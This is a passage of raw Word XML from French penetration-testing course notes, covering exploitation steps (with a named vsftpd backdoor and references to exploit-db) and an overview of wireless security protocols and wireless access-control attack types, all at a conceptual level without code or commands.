        <w:t xml:space="preserve"> -&gt; Outils autonomes qui faciliteront la recherche de vulnérabilités, l’évaluation des </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6900C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">vulnérabilités ou les tests d'intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B610110" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0372A173" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Un exploit est une attaque qui tire parti des vulnérabilités des applications, du système d’exploit, des réseaux ou du matériel. Les exploits se présentent généralement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA87C23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5DAF2FDE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24CC39BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="49CF8BDB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_wf69we395qi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="3A3530FE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="25A55159" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_sj6a6kbvyn3w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Module 6 - Exploitation des failles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E8B56" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA4516F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_nwner992pta9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 - Analyse de la vulnérabilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D4FE71" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="66321D33" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Après identification des vulnérabilités du système cible, il faut les exploiter, afin de démontrer la gravité de la vulnérabilité et de fournir des recommandations de sécurité pour la corriger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9719CD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5EC59301" w14:textId="68B71987" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Les vulnérabilités peuvent </w:t>
      </w:r>
      <w:r w:rsidR="00302CD2">
        <w:t>être</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utilisées pour : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA57CC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="53B0E251" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Récupérer de l’info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E71937" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Faire planter le système affecté</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF1A04" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prendre complètement le contrôle du système affecté </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2555C66C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="66A9F533" w14:textId="43C21512" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Les étapes pour l’exploiter les vulnérabilités</w:t>
      </w:r>
      <w:r w:rsidR="00302CD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213088CF" w14:textId="34BE4619" w:rsidR="00223B72" w:rsidRDefault="00302CD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Évaluation de la gravité de la vulnérabilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD3A86" w14:textId="341723F6" w:rsidR="00223B72" w:rsidRDefault="00302CD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploitation de la vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB11E7" w14:textId="1E66012B" w:rsidR="00223B72" w:rsidRDefault="00302CD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Évaluation des résultats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAA1FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rapport et documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A151CEE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4703D53D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79186BE2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="38EFBE6E" w14:textId="048C9564" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_elpmlco6526e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - </w:t>
      </w:r>
      <w:r w:rsidR="00302CD2">
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Évaluation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la gravité de la vulnérabilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60694937" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="422AB938" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Evaluation de la gravité de la vulnérabilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1064F1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1BFD7C52" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.exploit-db.co</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697188C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recherche des informations concernant la faille</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95ACFE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backdoor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="021A68F7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.rapid7.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A39734B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1908DA7E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B2E0E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0069C7B2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751EB4BA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36084533" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76538087" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C76B46C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F49D53" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7344705C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23977954" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05164165" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D763CF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_de4s1ata4tlp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 7 - Réseaux sans fil et sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1CC4CD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0DB6ED0E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_jytvwtj84x62" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 - Les réseaux sans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WLAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB0D9E0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="44A32B29" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="42BB93FE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le réseau WLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Wireless Local Area Network) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( ou</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> réseau local sans fil) permet à un utilisateur de se connecter à internet et aux ressources du réseau sans câbles. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312957C8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1A196BB3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Avantages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Mobilité des utilisateurs, la flexibilité du déploiement et la réduction des coûts d’installation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4575E9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6FC95B36" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Inconvénients</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : sécurité limitée, portée limitée, possibilité d’interférences radio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD1238" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="62709B86" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WI-FI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B51D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GSM (téléphone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4EE5F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D823AB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wimax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD3E25" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="43A60847" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Modes de fonctionnement d’un réseau </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wlan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539868EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="18FE43D6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Infrastructure : un routeur et des utilisateurs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D2642" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ad hoc : </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>des utilisateur</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en peer-to-peer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753190AF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="09887A32" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="53C483F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_qx88l1d6h33a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Les protocoles de sécurité d’un réseau WLAN sont </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35067BBC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C5A433" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wired</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>equivalent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privacy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) protocole de sécurité ancien, peu sécurisé </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D392E9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WPA </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(WIFI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access 2= plus sécurisé que WEP mais vulnérable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE2110" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Wifi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access 2) plus sécurisé que WAP, le plus utilisé aujourd'hui </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A074F75" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WPA3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Wifi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access 3) plus sécurisé que WAP2, utilisé pour </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les réseaux public</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="058023E2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FED49A1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_ezq54dwqsfnm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - Les différents types d’attaques sans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui existant </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E65A0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FD978C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Les attaques de contrôle d’accès</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : accès à un réseau sans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en contournant les protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ABA968" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428EC290" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Points d’accès pirate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : points d’accès non sécurisé utilisés pour créer des portes dérobées dans un réseau de confiance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAE899" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784A3110" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Usurpation de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>MACs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : tente d'usurper l’adresse mac d’un point d’accès ou d’une station déjà autorisée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514919D7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C711DA6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Association ad hoc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : connexion directe à une station. Contournement de la sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B73A0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
